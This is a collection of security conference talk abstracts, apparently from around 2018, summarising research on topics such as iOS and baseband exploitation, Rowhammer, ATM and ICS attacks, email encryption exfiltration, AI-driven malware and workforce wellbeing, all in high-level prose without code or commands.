Working in security is a principled decision. Many of us do this because we want to help make technology more reliable and safer for our friends, our family - for humanity. Your skills got you a job, but your principles and drive got you the skills.
Turning your ideals into real, concrete outcomes at scale is… daunting. Interconnected networks, billions of lines of ever-evolving code, third party dependencies and legacy requirements, competing priorities, conflicting incentives, snake oil solutions; these are just a few of the challenges that are familiar to security professionals, and that doesn't even include the social and communication barriers or endless philosophical debates.
So, how do you actually make technology in complex landscapes safer, at scale?
This talk offers guiding advice that we as security practitioners and leaders must embrace in order to succeed. Drawing on her experiences leading some of the biggest, ongoing security efforts that aim to make technology safer for all users, Parisa will first share how throwing out the rule book on vulnerability disclosure has been moving giants of the software industry toward measurably faster patching and end-user security. Next, she will share how a grassroots side project grew to shift the majority of the web ecosystem to secure transport, nearly 25 years after the technology was first made available. Finally, she will review the major effort to implement an intern's publication in one of today's largest open source projects, and how they persevered for 5+ years of refactoring, avoiding efforts to defund the work along the way. (Coincidentally, this project helped the world's most popular browser mitigate a new class of hardware vulnerabilities earlier this year!)
In December last year, I released the async_wake exploit for iOS 11.1.2. In this talk, I'll cover how each step of the exploit worked and discuss in depth each mitigation which was defeated along the way.
I'll focus on what was supposed to make exploitation hard, what techniques other public exploits would have used in earlier iOS versions, and what mitigations we might see in iOS 12 and beyond (and how to break those too!).
On macOS, DEP (Device Enrollment Program) and MDM (Mobile Device Management) are the recommended methods for automating the initial setup & configuration of new devices. MDM can offer sophisticated system configuration options, including privileged operations such as adding new trusted root CA certificates to the System Keychain. Apple's MDM implementation has gained popularity in the enterprise world recently due to their richer feature set.
The recent introduction of User Approved MDM and the continued enhancements to security technologies such SIP, Gatekeeper and others is evidence of Apple's ongoing commitment to MDM. Some operations, such as whitelisting of allowed kernel extensions, are now only supported if the device is enrolled in a trusted MDM. Under the hood, the DEP & MDM implementation involves many moving parts. Within macOS, several daemons are involved in the process of bootstrapping the trust necessary to bring a new up device to a fully provisioned state. If an attacker can identify vulnerabilities within the bootstrapping process and effectively exploit them, they may be able to make use of this trusted process to compromise a device as it first boots.
Our talk walks through the various stages of bootstrapping, showing which binaries are involved, the IPC flows on the device, and evaluates the network (TLS) security of key client/server communications. We will follow with a live demo showing how a nation-state actor could exploit this vulnerability such that a user could unwrap a brand new Mac, and the attacker could root it out of the box the first time it connects to WiFi.
Virtualization technology is an increasingly common foundation on which platform security is built and clouds are secured. However, virtualization stacks are ultimately software, all software has vulnerabilities, and few things are more beautiful (or scary) than a guest-to-host exploit.
Research into this cutting-edge area is not only interesting, it is extremely profitable. Microsoft offers a bug bounty program with rewards up to $250,000 USD for vulnerabilities in Hyper-V. To make your bounty hunting efforts easier , we will outline how Hyper-V works with a focus on the information you, as a security researcher, need to find vulnerabilities. This will cover relevant details about the Hyper-V hypervisor and supporting kernel-mode and user-mode components. We'll also show off some of the interesting vulnerabilities we've seen in Hyper-V and discuss what they would have fetched if they had been reported through the bounty.
Our talk presents attacks on the cryptography used in the cryptocurrency IOTA, which is currently the 10th largest cryptocurrency with a market capitalization of 2.8 billion USD. IOTA is billed as a next generation blockchain for the Internet of Things (IoT) and claims partnerships with major companies in the IoT space such as Volkswagen and Bosch.
We developed practical differential cryptanalysis attacks on IOTA's cryptographic hash function Curl-P, allowing us to quickly generate short colliding messages of the same length. Exploiting these weaknesses in Curl-P, we break the EU-CMA security of the IOTA signature scheme. Finally, we show that in a chosen message setting we can forge signatures on valid IOTA payments. We present and demonstrate a practical attack (achievable in a few minutes) whereby an attacker could forge a signature on an IOTA payment, and potentially use this forged signature to steal funds from another IOTA user.
After we disclosed our attacks to the IOTA project, they patched the vulnerabilities presented in our research. However, Curl-P is still used in other parts of IOTA.
AFL has claimed many successes on fuzzing a wide range of applications. In the past few years, researchers have continuously generated new improvements to enhance AFL's ability to find bugs. However, less attentions were given on how to hide bugs from AFL.
This talk is about AFL's blindspot — a limitation about AFL and how to use this limitation to resist AFL from finding specific bugs. AFL tracks code coverage through instrumentations and it uses coverage information to guide input mutations. Instead of fully recording the complete execution paths, AFL uses a compact hash bitmap to store code coverage. This compact bitmap brings high execution speed but also a constraint: new path can be masked by previous paths in the compact bitmap due to hash conflicts. The inaccuracy and incompleteness in coverage information sometimes prevents an AFL fuzzer from discovering potential paths that lead to new crashes.
This presentation demonstrates such limitations with examples showing how the blindspot limits AFL's ability to find bugs, and how it prevents AFL from taking seeds generated from complementary approaches such as symbolic execution.
To further illustrate this limitation, we build a software prototype called DeafL, which transforms and rewrites EFL binaries for the purpose of resisting AFL fuzzing. Without changing the functionality of a given ELF binary, the DeafL tool rewrites the input binary to a new EFL executable, so that an easy to find bug by AFL in the original binary becomes difficult to find in the rewritten binary.
Every single security company is talking in some way or another about how they are applying machine learning. Companies go out of their way to make sure they mention machine learning and not statistics when they explain how they work. Recently, that's not enough anymore either. As a security company you have to claim artificial intelligence to be even part of the conversation.
Guess what. It's all baloney. We have entered a state in cyber security that is, in fact, dangerous. We are blindly relying on algorithms to do the right thing. We are letting deep learning algorithms detect anomalies in our data without having a clue what that algorithm just did. In academia, they call this the lack of explainability and verifiability. But rather than building systems with actual security knowledge, companies are using algorithms that nobody understands and in turn discover wrong insights.
In this talk, I will show the limitations of machine learning, outline the issues of explainability, and show where deep learning should never be applied. I will show examples of how the blind application of algorithms (including deep learning) actually leads to wrong results. Algorithms are dangerous. We need to revert back to experts and invest in systems that learn from, and absorb the knowledge, of experts.
Containerization, such as that provided by Docker, is becoming very popular among developers of large-scale applications. This is likely to make life a lot easier for attackers.
While exploitation and manipulation of traditional monolithic applications might require specialized experience and training in the target languages and execution environment, applications made up of services distributed among multiple containers can be effectively explored and exploited "from within" using many of the system- and network-level techniques that attackers, such as penetration testers, already know.
The goal of this talk is to provide a penetration tester experienced in exploitation and post-exploitation of networks and systems with an exposure to containerization and the implications it has on offensive operations. Docker is used as a concrete example for the case study. A penetration tester can expect to leave this presentation with a practical exposure to multi-container application post-exploitation that is as buzzword-free as is possible with such a trendy topic.
The Rowhammer bug is an issue in most DRAM modules which allows software to cause bit flips in DRAM cells, consequently manipulating data. Although only considered a reliability issue by DRAM vendors, research has showed that a single bit flip can subvert the security of an entire computer system.
In the introduction of the talk, we will outline the developments around Rowhammer since its presentation at Black Hat USA 2015.
We discuss attacks and defenses that researchers came up with. The defenses against Rowhammer either try to prevent the Rowhammer effect entirely, or at least ensure that Rowhammer attacks cannot exploit the bug anymore.
We will present a novel Rowhammer attack that undermines all existing assumptions on the requirements for such attacks.
With one-location hammering, we show that Rowhammer does not necessarily require to access two or more addresses alternatingly.
We explain that modern CPUs rely on memory-controller policies that enables an attacker to use this new hammering technique.
Moreover, we introduce new building blocks for exploiting Rowhammer-like bit flips which circumvent all currently proposed countermeasures. In addition to classical privilege escalation attacks, we also demonstrate a new, easily mountable denial-of-service attack which can be exploited in the cloud.
We will also show that despite all efforts, the Rowhammer bug is still not prevented. We conclude that more research is required to fully understand this bug to subsequently be able to design efficient and secure countermeasures.
In the not too distant future, we'll live in a world where computers are driving our cars. Soon, cars may not even have steering wheels or brake pedals. But, in this scenario, should we be worried about cyber attack of these vehicles? In this talk, two researchers who have headed self-driving car security teams for multiple companies will discuss how self driving cars work, how they might be attacked, and how they can ultimately be secured.
With the advent of electronic trading platforms and networks, the exchange of financial securities now is easier and faster than ever; but this comes with inherent risks. Nowadays, not only rich people can invest in the money markets, but also anyone with as little as $10 could start trading stocks from either a mobile phone, a desktop application or a website.
The problem is that this area of the fintech industry has not been fully under the cybersecurity umbrella. Sometimes we assume that a product is secure by its nature, such as technologies that are used to trade hundreds of billions per day, but security testing tells us a different story.
In this talk, vulnerabilities that affect millions of traders will be shown in detail. Among them are unencrypted authentication, communications, passwords and trading data; remote DoS that leave the applications useless, weak password policies, hardcoded secrets, poor session management, etc. Also, many of these applications lack of countermeasures such as SSL certificate validation and root detection in mobile apps, privacy mode to mask sensitive values, anti-exploitation and anti-reversing mitigations.
Moreover, the risk of social trading will be discussed too as well as how malicious expert advisors (trading robots) and other plugins could include backdoors or hostile code that would be hard to spot for non tech-savvy traders.
The analysis encompassed the following platforms, which are some of the most used ones:
- 16 Desktop applications
- 29 Websites (7 focused on cryptocurrencies)
- 34 Mobile apps
Finally, the gap between the security in online banking vs trading technologies will be clearly observed. There's still a long way to go to improve the security of the trading ecosystem, but the wheel is already invented and common security countermeasures could be applied.
The Android Runtime (ART), even though introduced in Android 5 already, has not received much attention in the security community. However, its on-device compiler dex2oat, which mostly deprecated the Dalvik VM, leaves a gap by rendering well-known tools such as TaintDroid and its descendents inapplicable. But it also provides new opportunities for security researchers.
On top of dex2oat, we created ARTist, the Android instrumentation and security toolkit, which is a novel instrumentation framework that allows for arbitrarily code modification of installed apps, the system server and the Java framework code. Similar to existing approaches, such as Frida and XPosed, ARTist can be used for app analysis and reversing (record traffic, modify files and databases), as well as modding and customization. However, it occupies a sweet spot in the design spaces of instrumentation tools since it does not break the app signature and hence modified applications still receive updates without compromising on security, it can be deployed on rooted stock devices beginning from Android 6 and it allows for instrumentation on the instruction level.
We provide developers with a module SDK to get started with writing own instrumentation routines right away. Since no complicated system of hooks or another runtime are required, it is highly efficient and neatly integrates with the compiler's optimization framework. We created a range of interesting modules that showcase different use cases, from the large-scale instrumentation of each single method in the system server (25k methods) to simple, on-point injections in third party apps and even full compartmentalization of advertisement libraries. Our tool is open sourced at https://github.com/Project-ARTist and https://artist.cispa.saarland. ARTist is still in its early stages, so we hope to collect a lot of feedback and create an active community.
Although vulnerabilities stemming from the deserialization of untrusted data have been understood for many years, unsafe deserialization continues to be a vulnerability class that isn't going away. Attention on Java deserialization vulnerabilities skyrocketed in 2015 when Frohoff and Lawrence published an RCE gadget chain in the Apache Commons library and as recently as last year's Black Hat, Muñoz and Miroshis presented a survey of dangerous JSON deserialization libraries. While much research and automated detection technology has so far focused on the discovery of vulnerable entry points (i.e. code that deserializes untrusted data), finding a "gadget chain" to actually make the vulnerability exploitable has thus far been a largely manual exercise. In this talk, I present a new technique for the automated discovery of deserialization gadget chains in Java, allowing defensive teams to quickly identify the significance of a deserialization vulnerability and allowing penetration testers to quickly develop working exploits. At the conclusion, I will also be releasing a FOSS toolkit which utilizes this methodology and has been used to successfully develop many deserialization exploits in both internal applications and open source projects.
The Namecoin and Emercoin blockchains were designed to provide decentralized and takedown-resistant domain names to users with the reported goal of promoting free speech. By leveraging unofficial Top-Level Domains (TLDs) such as .bit and alternate DNS resolution methods such as the OpenNIC project, users can register and configure their own domains on these blockchains at a relatively cheap price.
In recent years, cybercriminals have adopted and abused this infrastructure and implemented it into well-known malware such as Dimnie, Smoke Loader, and Necurs as well as larger, more targeted workflows. The resiliency of blockchain techology prevents researchers and ISPs from taking down or sinkholing these domains. In addition, limited public knowledge of this threat in a larger context and the constraint of alternative DNS resolution mitigates an analyst's ability to map out related domains and IP addresses when malicious activity is identified.
On the other hand, blockchain-based infrastructure comes with a serious drawback: data added to or removed from these blockchains becomes a permanent record of a threat actor's activity. This talk is intended to leverage this attribute to tackle these issues, providing high and medium-confidence methodologies for mapping out these blockchains through TTP analysis, script-based transaction mapping, and index-based infrastructure correlation. In doing so, analysts will be able to generate additional intelligence surrounding a threat and proactively identify likely malicious domains as they are registered or become active on the blockchain.
It's January 2nd, 2018. Your phone buzzes. You've been working for more than 6 months to fight a new class of hardware vulnerabilities with a number of other companies. You *had* seven days until planned disclosure, but the incoming text tells you that there has been a leak and disclosure is now less than 24 hours away. You aren't ready…what do you do?
Months before the public learned about the challenges with speculative execution, defenders from hardware, platform, cloud, and service providers were working together around the clock building mitigations and coordinating a response to help protect the billions of users depending on their platforms. This is the behind the scenes story of what those months were like, from the perspective of Apple, Google, and Microsoft. Along the way, competitors became partners and an unprecedented level of information was shared.
Much has been written about how to do multi-party coordinated response, it's time to throw out what you know – we need a new playbook. In this panel, you'll learn about details of the response that have never been shared with the public, and you'll come away with lessons about what worked and what didn't in the most complicated multi-party vulnerability in memory.
The tech industry is increasingly interdependent and Spectre and Meltdown are a wake-up call on multiple dimensions – how we engineer, how we partner, and how we react when we find new security issues. This panel won't give you all the answers, but it is a start.
The number of logic attacks on ATMs continues to rise. Some of them involve a "black box," a device that is physically connected to the cash dispenser and sends commands to push out cash. Within five years of the first known black box attacks (starting from 2012), almost all new ATMs started encrypting commands to the dispenser as a precautionary measure. The research community attempted to investigate security of the implemented encryption and even obtained positive results (such results were described by Positive Technologies researchers). Criminals concentrated their efforts on easier targets, since unprotected ATMs remained plentiful. However, this situation changed rapidly in the fall of 2017 when criminals began to employ attacks on the "secure" dispenser interface. The current state of security is discouraging: we analyzed four commercially available dispensers from major vendors and successfully withdrew cash from all of them. So despite all the efforts, ATM security is still little better than in 2012.
In the blockchain, contracts may be lost but are never forgotten. Over 1,500,000 Ethereum smart contracts have been created on the blockchain but under 7,000 unique contracts have value today. An even smaller fraction of those have source code to analyze. Old contracts have been purged from the world computer's working memory but they can be reconstructed and analyzed. When a contract's purpose is fulfilled, the owner typically triggers a self-destruct switch that removes code and state. These steps are similar to what an attacker would do after hijacking a contract. Is it likely the self-destruct was intentional or performed by a trusted third party? Or was it a hack or fraud? By investigating the transactions leading up to the termination of a binary-only contract, we can determine if there was an attack. After identifying an attacker, we can find patterns that lead to a possible motive by carefully examining their other transactions.
This presentation will introduce Ethereum smart contracts, explain how to reverse engineer binary-only contracts, describe common classes of vulnerabilities, and then show how to investigate attacks on contracts by demonstrating new tools that re-process blockchain ledger data, recreate contracts with state, and analyze suspect transactions using traces and heuristics.
We propose a new exploit technique that brings a whole-new attack surface to defeat path normalization, which is complicated in implementation due to many implicit properties and edge cases. This complication, being under-estimated or ignored by developers for a long time, has made our proposed attack vector possible, lethal, and general. Therefore, many 0days have been discovered via this approach in popular web frameworks written in trending programming languages, including Python, Ruby, Java, and JavaScript.
Being a very fundamental problem that exists in path normalization logic, sophisticated web frameworks can also suffer. For example, we've found various 0days on Java Spring Framework, Ruby on Rails, Next.js, and Python aiohttp, just to name a few. This general technique can also adapt to multi-layered web architecture, such as using Nginx or Apache as a proxy for Tomcat. In that case, reverse proxy protections can be bypassed. To make things worse, we're able to chain path normalization bugs to bypass authentication and achieve RCE in real world Bug Bounty Programs. Several scenarios will be demonstrated to illustrate how path normalization can be exploited to achieve sensitive information disclosure, SMB-Relay and RCE.
Understanding the basics of this technique, the audience won't be surprised to know that more than 10 vulnerabilities have been found in sophisticated frameworks and multi-layered web architectures aforementioned via this technique.
Industrial control gateways connect most of the critical infrastructure surrounding us to the centralized management systems: From power grids (transformer stations, solar fields), city infrastructure (traffic lights, tunnel control systems) to big industrial plants (automotive, chemical), these devices can be found almost everywhere. In the last years these gateways have even been known to be used in attacks on countries such as the Ukraine in 2015 and Saudi Arabia in 2018. This presentation reviews the security of those gateways; going from attacking the communication protocols up to reverse engineering and fuzzing proprietary firmwares and protocols, concluding with a live demonstration of the vulnerabilities on real devices, showing that the industrial control gateways from most vendors have significant security shortcomings and are not secure enough to be used in critical infrastructure.
The software defined wide-area network is technology based on SDN approach applied to branch office connections in Enterprises. According to Gartner's predictions, more than 50% of routers will be replaced with SD-WAN Solutions by 2020.
The SD-WAN can have firewalls and other perimeter security features on board which makes them attractive targets for attackers. Vendors promise "on-the-fly agility, security" and many other benefits. But what does "security" really mean from a hand-on perspective? Most of SD-WAN solutions are distributed as Linux-based Virtual Appliances or a Cloud-centric service which can make them low-hanging fruit even for script kiddie.
This presentation will introduce practical analysis of different SD-WAN solutions from the attacker perspective. Attack surface, threat model and real-world vulnerabilities in SD-WAN solutions will be presented.
Social engineering is a big problem but very little progress has been made in stopping it, aside from the detection of email phishing. Social engineering attacks are launched via many vectors in addition to email, including phone, in-person, and via messaging. Detecting these non-email attacks requires a content-based approach that analyzes the meaning of the attack message.
We observe that any social engineering attack must either ask a question whose answer is private, or command the victim to perform a forbidden action. Our approach uses natural language processing (NLP) techniques to detect questions and commands in the messages and determine whether or not they are malicious.
Question answering approaches, a hot topic in information extraction, attempt to provide answers to factoid questions. Although the current state-of-the-art in question answering is imperfect, we have found that even approximate answers are sufficient to determine the privacy of an answer. Commands are evaluated by summarizing their meaning as a combination of the main verb and its direct object in the sentence. The verb-object pairs are compared against a blacklist to see if they are malicious.
We have tested this approach with over 187,000 phishing and non-phishing emails. We discuss the false positives and false negatives and why this is not an issue in a system deployed for detecting non-email attacks. In the talk, demos will be shown and tools will be released so that attendees can explore our approach for themselves.
Security researchers have done a good amount of practical attacks in the past using chosen plain-text attacks on compressed traffic to steal sensitive data. In spite of how popular CRIME and BREACH were, little was talked about how this class of attacks was relevant to VPN networks. Compression oracle attacks are not limited to TLS protected data. Regardless of the underlying encryption framework being used, these VPN networks offer a very well used feature usually known as TCP Compression which in a way acts almost similar to the TLS compression feature pre-CRIME era.
In this talk, we try these attacks on browser requests and responses which usually tunnel their HTTP traffic through VPNs. We also explore the possibility of attacking ESP Compression and other such optimizations in any tunneled traffic which does encryption. We also show a case study with a well-known VPN server and their plethora of clients.
We then go into practical defenses and how mitigations in HTTP/2's HPACK and other mitigation techniques are the way forward rather than claiming 'Thou shall not compress traffic at all.' One of the things that we would like to showcase is how impedance mismatches in these different layers of technologies affect security and how they don't play well together.
This talk sheds some light into the intermediate language that is used inside the Hex-Rays Decompiler. The microcode is simple yet powerful to represent real world programs. With the microcode details publicly available, now it is possible to build more intelligent binary analysis tools on top of the decompiler.
Industrial control systems (ICS) security has become a serious concern over the past years. Indeed, threat to ICS systems has become reality and real world attacks have been observed. Many systems driving critical functions cannot be stopped to receive security upgrades, protecting those very sensitive assets is thus a tough challenge.
As ICS security market is growing fast, dedicated firewalls have appeared to address this problem by inspecting and filtering industrial control protocols. But what are those solutions worth? Are they really different from standard network firewalls? What are exactly their attack surfaces and what kind of bugs may we find there?
We propose to answer those questions on the Tofino Xenon case. We will present a methodology we used to reverse engineer equipment which uses a custom and encrypted administration protocol and has fully encrypted firmware. From reverse engineering a rich client to obtaining root shell on the appliance. Then we will cover the firewall internals, the attack surface it offers and the security features it provides to vulnerable ICS equipments. Finally, we will present the vulnerabilities we found (CVE-2017-11400, CVE-2017-11401 and CVE-2017-11402), their impact and the attack scenarios to exploit them.
Anyone who keeps up with technology news has read about deep neural networks beating human champions at Go, achieving breakthrough accuracy at voice recognition, and generally driving today's major advances in artificial intelligence. Little has been said, however, about the ways deep neural network approaches are quietly achieving analogous breakthroughs in intrusion detection. My goal with this presentation is to change this, by demystifying deep neural network (deep learning) concepts, presenting research that shows that we can use deep learning methods to achieve breakthrough cyber-attack detection, and by introducing open source deep learning tools, so that attendees can leave equipped to start their own security deep neural network research.
The presentation will start with an intuitive overview of deep neural networks, introducing the ideas that allow neural networks to learn from data and make accurate decisions about whether, for example, files are good or bad, or a given URL or domain name is malicious. After introducing deep neural networks, I'll go on to describe a case study: a deep neural network that uses a convolutional neural network approach to detect previously malicious URLs at higher accuracy than any previously reported techniques, which we have evaluated on live, real world data. Finally, I'll introduce the open source tools available for doing security deep learning research, giving attendees a starting place for incorporating deep neural networks into their own security practice.
In this talk, we describe DeepLocker, a novel class of highly targeted and evasive attacks powered by artificial intelligence (AI). As cybercriminals increasingly weaponize AI, cyber defenders must understand the mechanisms and implications of the malicious use of AI in order to stay ahead of these threats and deploy appropriate defenses.
DeepLocker was developed as a proof of concept by IBM Research in order to understand how several AI and malware techniques already being seen in the wild could be combined to create a highly evasive new breed of malware, which conceals its malicious intent until it reached a specific victim. It achieves this by using a Deep Neural Network (DNN) AI-model to hide its attack payload in benign carrier applications, while the payload will only be unlocked if—and only if —the intended target is reached. DeepLocker leverages several attributes for target identification, including visual, audio, geolocation, and system-level features. In contrast to existing evasive and targeted malware, this method would make it extremely challenging to reverse engineer the benign carrier software and recover the mission-critical secrets, including the attack payload and the specifics of the target.
We will perform a live demonstration of a proof-of-concept implementation of a DeepLocker malware, in which we camouflage well-known ransomware in a benign application such that it remains undetected by malware analysis tools, including anti-virus engines and malware sandboxes. We will discuss technical details, implications, and use cases of DeepLocker. More importantly, we will share countermeasures that could help defend against this type of attack in the wild.
In February 2018, an article appeared concerning 'cybersecurity PTSD' and its impact on the security workforce, spurring a reaction to the terminology and the conditions referenced. More anecdotally, we as security practitioners have all heard co-workers lament of a stressful experience resulting in some sort of workplace 'PTSD.' While it is therapeutic to joke about serious issues at times, as a Post-Traumatic Stress Disorder sufferer and survivor there are limits – but also scope to identify moments for our industry to grow in facing such issues.
Whether through sexual trauma, military service, or other traumatic experiences, the number of diagnosed cases of PTSD is increasing – and along with it the chances that you will encounter someone living with this condition in the workplace. As the security industry grows and matures, the proper response is not to ignore, avoid, or shun this topic, but to embrace PTSD and coworkers and colleagues experiencing it to better understand the condition and formulate a better, more understanding workplace.
In this talk, I will speak to my own story of PTSD – from military service in Afghanistan to a very unique medical trauma – and how it has shaped not just my life, but my work in cybersecurity. Principally, cybersecurity has offered a haven for myself cognitively and emotionally - and I feel that I am not alone in finding peace and solace in our field. In providing this overview, I will touch on various points that we as a community can embrace to better understand and support those in our midst who may also suffer from such a condition.
Overall, the goal is to keep matters reasonably 'light' so we as a community can discuss such subjects, while at the same time diving head on into how the security culture both supports and provides difficulties to PTSD survivors. Ultimately, developing a more empathetic, emotionally aware security community will only benefit us as a profession – and PTSD is an excellent starting point for such a conversation.
Credential compromise in the cloud is not a threat that one company faces, rather it is a widespread concern as more and more companies operate in the cloud. Credential compromise can lead to many different outcomes depending on the motive of the attacker who compromised the credentials. In some cases in the past, it has led to erroneous AWS service usage for bitcoin mining or other non-destructive yet costly abuse, and in others it has led to companies shutting down due to the loss of data and infrastructure.
This paper describes an approach for detection of compromised credentials in AWS without needing to know all IPs in your infrastructure beforehand.
Until recently, major public cloud providers have offered relatively basic toolsets for identifying suspicious activity occurring inside customer accounts that may indicate a compromise. Some organizations have invested significant resources to build their own tools or have leveraged industry vendor offerings to provide this visibility. The reality is, that barrier has meant that a large number of organizations haven't dedicated those resources to this problem and therefore operate without sufficient detection and response capabilities that monitor their cloud accounts for compromise.
Amazon Web Services, Google Cloud Platform, and Microsoft Azure have recently launched a new set of native platform threat and anomalous behavior detection services to help their customers better identify and respond to certain issues and activities occurring inside their cloud accounts. From detecting crypto-currency mining to identifying bot-infected systems to alerting on suspicious cloud credential usage to triggering on cloud-specific methods of data exfiltration, these new services aim to make these kinds of detections much easier and simpler to centrally manage.
But what new and unique insights do they offer? What configuration is required to achieve the full benefits of these detections? What types of activities are not yet covered? What attack methods and techniques can avoid detection by these systems and still be successful? What practical guidelines can be followed to make the best use of these services in an organization?
Follow along as we attempt to answer these questions using practical demonstrations that highlight the real threats facing cloud account owners and how the new threat detection capabilities perform in reducing the risks of operating workloads in the public cloud.
For years and years, anti-malware solutions, across many levels of the network, have been assisted by online anti-virus aggregation services and online sandboxes to extend their detection level and identify unknown threats. But, this power booster comes with a price tag. Even today, enterprises all over the world are using security solutions that instead of protecting the data, are suspecting it as malicious and sharing it with online multi-scanners. The result is drastic. What separates a hacker from extracting all that data on a daily basis is a couple of hundreds euros, monthly. A price which could be covered easily if that hacker finds a man of interest. In just a couple of days, one skilled hacker can build an intelligence platform that could be sold in 10 times the money they invested.
The data is being leaked daily and the variety is endless. In our research, we dived into these malware-scanning giants and built sophisticated Yara rules to capture non-malicious artifacts and dissect them from secrets you've never thought possible of getting out of their chamber. But that's not all. We will show the audience how we built an intelligence tool, that upon insertion of an API key, will auto-dissect a full dataset. In our talk, we reveal the awful truth about allowing internally installed security products to be romantically involved with online scanners.
Automated Twitter accounts have been making headlines for their ability to spread spam and malware as well as significantly influence online discussion and sentiment. In this talk, we explore the economy around Twitter bots, as well as demonstrate how attendees can track down bots in through a three step methodology: building a dataset, identifying common attributes of bot accounts, and building a classifier to accurately identify bots at scale.
We first demonstrate how to amass a large dataset of public Twitter accounts using the Twitter API, gathering basic profile information as well as public activity from each account. We go on to gather and map the "social graph" of each account, such as who the account is following and, likewise, who is following the account.
After this dataset has been obtained, we explore how to identify bots within it. We show common techniques used by real-world bot operators to try and keep the bot "under the radar", which can in many cases be used to help to fingerprint the bot. Finally, we demonstrate how we can tackle the bot problem at scale using data science to build a classifier that accurately identifies bots across our large global dataset.
When caching servers and load balancers became an integral part of the Internet's infrastructure, vendors introduced what is called "Edge Side Includes" (ESI), a technology allowing malleability in caching systems. This legacy technology, still implemented in nearly all popular HTTP surrogates (caching/load balancing services), is dangerous by design and brings a yet unexplored vector for web-based attacks.
The ESI language consists of a small set of instructions represented by XML tags, served by the backend application server, which are processed on the Edge servers (load balancers, reverse proxies). Due to the upstream-trusting nature of Edge servers, the ESI engine tasked to parse and execute these instructions are not able to distinguish between ESI instructions legitimately provided by the application server, and malicious instructions injected by a malicious party. Through our research, we explored the risks that may be encountered through ESI injection: We identified that ESI can be used to perform SSRF, bypass reflected XSS filters (Chrome), and silently extract cookies. Because this attack vector leverages flaws on Edge servers and not on the client-side, the ESI engine can be reliably exploited to steal all cookies, including those protected by the HttpOnly mitigation flag, allowing JavaScript-less session hijacking.
Identified affected vendors include Akamai, Varnish Cache, Squid Proxy, Fastly, IBM WebSphere, Oracle WebLogic, F5, and countless language-specific solutions (NodeJS, Ruby, etc.). This presentation will start by defining ESI and visiting typical infrastructures leveraging this model. We will then delve into to the good stuff; identification and exploitation of popular ESI engines, and mitigation recommendations.
OpenPGP and S/MIME are the two prime standards for providing end-to-end security for emails. From today's viewpoint this is surprising as both standards rely on outdated cryptographic primitives that were responsible for vulnerabilities in major cryptographic standards. The belief in email security is likely based on the fact that email is non-interactive and thus an attacker cannot directly exploit vulnerability types present in TLS, SSH, or IPsec.
We show that this assumption is wrong. We use a novel attack technique called malleability gadgets to inject malicious plaintext snippets into encrypted emails via malleable encryption. These snippets abuse existing and standard-conforming backchannels, for example, in HTML, CSS, or x509 functionality, to exfiltrate the full plaintext after decryption. The attack is triggered when the victim decrypts a single maliciously crafted email from the attacker.
We devise working malleability gadgets for both OpenPGP and S/MIME encryption, and show that exfiltration channels exist for 25 of the 35 tested S/MIME email clients and 10 of the 28 tested OpenPGP email clients. While it is necessary to change the OpenPGP and S/MIME standards to fix these vulnerabilities, some clients had even more severe implementation flaws allowing straightforward exfiltration of the plaintext.
Traditional phishing and social engineering attack techniques are typically well-documented and understood. While such attacks often still succeed, a combination of psychology, awareness campaigns, and technical or physical controls has made significant progress in limiting their effectiveness.
In response, attackers are turning to increasingly sophisticated and longer-term efforts involving self-referencing synthetic networks, multiple credible false personae, and highly targeted and detailed reconnaissance. This approach, which I call ROSE (Remote Online Social Engineering), is a variant of catfishing, and is performed with the specific aim of compromising an organisation's network. By building rapport with targeted victims, attackers are able to elicit sensitive information, gather material for extortion, and persuade users to take actions leading to compromises.
In this talk, I place ROSE within the context of other false personae activities – trolling, sockpuppetry, bots, catfishing, and others – using detailed case studies, and provide a comprehensive and in-depth methodology of an example ROSE campaign, from target selection and profile building, through to first contact and priming victims, and finally to the pay-off and exit strategies, based on experiences from red team campaigns.
I'll discuss three case studies of ROSE attacks in the wild, comparing them to the methodology I developed, and will then discuss the ethical, social, and legal issues involved in ROSE attacks. I'll proceed to cover ROSE from a defender's perspective, examining ways in which specific techniques can be detected and prevented, through technical controls, attribution, linguistic analysis, and responses to specific enquiries. To take this approach one step further, I'll also explore ways in which ROSE techniques could be used for 'offensive defence'.
Finally, I'll wrap up by examining future techniques which could be of use during ROSE campaigns or for their detection, and will invite the audience to suggest other ways in which ROSE techniques could be combatted.
In this talk, we will explore the baseband of a modern smartphone, discussing the design and the security countermeasures that are implemented. We will then move on and explain how to find memory corruption bugs and exploit them. As a case study, we will explain in details our 2017 Mobile Pwn2Own entry, where we gained RCE (Remote Code Execution) with a 0-day on the baseband of a smartphone, which was among the target of the competition. We exploited successfully the phone remotely over the air without any user interaction and won $100,000 for this competition target.
The purpose of an information security awareness program serves to protect business data through user education to properly handle constant information security threats and to minimize its impact to the individual and the organization. Past research has not offered comprehensive studies involving an established security awareness program that uses both end user training and marketing tools to communicate and create awareness. Instead, these studies focused on the impact of data loss and addressing the importance of establishing user awareness.
The Office of Information Security at Mayo Clinic has established an ongoing enterprise-wide security awareness program. With the help of Information Security Ambassadors to assist in the delivery of this message, the study explores the lived experiences of this peer group to determine the impact of autonomous peer influence as it relates to phishing detection than to rely on technology alone.
Significance of this research will help identify if and how much peer influence promotes learning and user adaptation to safeguard users from malicious phishing in both the business and the private environment. This phenomenological approach aims to assist in the designing of a multifaceted security awareness approach to promote behavior change among a diverse population.
In a world of high volume malware and limited researchers, we need a dramatic improvement in our ability to process and analyze new and old malware at scale. Unfortunately, what is currently available to the community is incredibly cost prohibitive or does not rise to the challenge. As malware authors and distributors share code and prepackaged tool kits, the white hat community is dominated by solutions aimed at profit as opposed to augmenting capabilities available to the broader community. With that in mind, we are introducing our library for malware disassembly called Xori as an open source project. Xori is focused on helping reverse engineers analyze binaries, optimizing for time and effort spent per sample.
Xori is an automation-ready disassembly and static analysis library that consumes shellcode or PE binaries and provides triage analysis data. This Rust library emulates the stack, register states, and reference tables to identify suspicious functionality for manual analysis. Xori extracts structured data from binaries to use in machine learning and data science pipelines.
We will go over the pain-points of conventional open source disassemblers that Xori solves, examples of identifying suspicious functionality, and some of the interesting things we've done with the library. We invite everyone in the community to use it, help contribute and make it an increasingly valuable tool in this arms race.
Setting up a fuzzing pipeline takes time and manual effort for identifying fuzzable programs and configuring the fuzzer.
Usually only large software projects with dedicated testing teams at their disposal are equipped to use fuzz testing in their Security Development Lifecycle. Other projects with limited resources cannot easily use this effective technique in their SDL. This renders the software landscape unnecessarily insecure. Especially less popular software applications are not being fuzzed due to a lack of resources and easy to use tooling.
Lowering the required skill level and effort to set up a fuzzing pipeline therefore results in a significant increase of today's software's security. To tackle this challenge, we developed an easy to use framework, FuzzExMachina (FExM), that reduces manual effort to a minimum.
